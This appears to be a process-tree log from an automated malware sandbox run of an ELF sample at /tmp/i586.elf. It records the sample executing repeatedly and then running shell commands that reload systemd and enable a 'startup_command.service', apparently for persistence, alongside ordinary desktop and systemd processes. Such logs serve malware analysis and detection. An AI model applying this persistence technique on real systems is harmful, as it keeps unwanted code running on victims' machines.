                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:07
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:07
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:15
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:15
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:15
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:22
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:22
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:27
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:30
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:37
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:37
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:42
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:45
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:47
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:33:47
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45
                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl daemon-reload"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl daemon-reload
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/tmp/i586.elf
                                                                                        Arguments:-
                                                                                        File size:70796 bytes
                                                                                        MD5 hash:2d0bd765ed70648d44343839f6927c45

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/bin/sh
                                                                                        Arguments:sh -c "systemctl enable startup_command.service"
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:47
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/bin/sh
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:47
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/systemctl
                                                                                        Arguments:systemctl enable startup_command.service
                                                                                        File size:996584 bytes
                                                                                        MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:-
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time (UTC):23:31:46
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File size:22760 bytes
                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                        Start time (UTC):23:31:48
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:-
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time (UTC):23:31:48
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                        File size:22760 bytes
                                                                                        MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                                        Start time (UTC):23:31:48
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/libexec/gnome-session-binary
                                                                                        Arguments:-
                                                                                        File size:334664 bytes
                                                                                        MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                        Start time (UTC):23:31:48
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/bin/sh
                                                                                        Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:49
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/libexec/gsd-rfkill
                                                                                        Arguments:/usr/libexec/gsd-rfkill
                                                                                        File size:51808 bytes
                                                                                        MD5 hash:88a16a3c0aba1759358c06215ecfb5cc

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/rm
                                                                                        Arguments:rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZB
                                                                                        File size:72056 bytes
                                                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/dash
                                                                                        Arguments:-
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/bin/rm
                                                                                        Arguments:rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZB
                                                                                        File size:72056 bytes
                                                                                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/lib/systemd/systemd
                                                                                        Arguments:-
                                                                                        File size:1620224 bytes
                                                                                        MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                                        Start time (UTC):23:31:50
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/lib/systemd/systemd-hostnamed
                                                                                        Arguments:/lib/systemd/systemd-hostnamed
                                                                                        File size:35040 bytes
                                                                                        MD5 hash:2cc8a5576629a2d5bd98e49a4b8bef65

                                                                                        Start time (UTC):23:31:51
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/sbin/gdm3
                                                                                        Arguments:-
                                                                                        File size:453296 bytes
                                                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                        Start time (UTC):23:31:51
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/etc/gdm3/PrimeOff/Default
                                                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                        Start time (UTC):23:31:51
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/usr/sbin/gdm3
                                                                                        Arguments:-
                                                                                        File size:453296 bytes
                                                                                        MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                                                        Start time (UTC):23:31:51
                                                                                        Start date (UTC):06/01/2025
                                                                                        Path:/etc/gdm3/PrimeOff/Default
                                                                                        Arguments:/etc/gdm3/PrimeOff/Default
                                                                                        File size:129816 bytes
                                                                                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c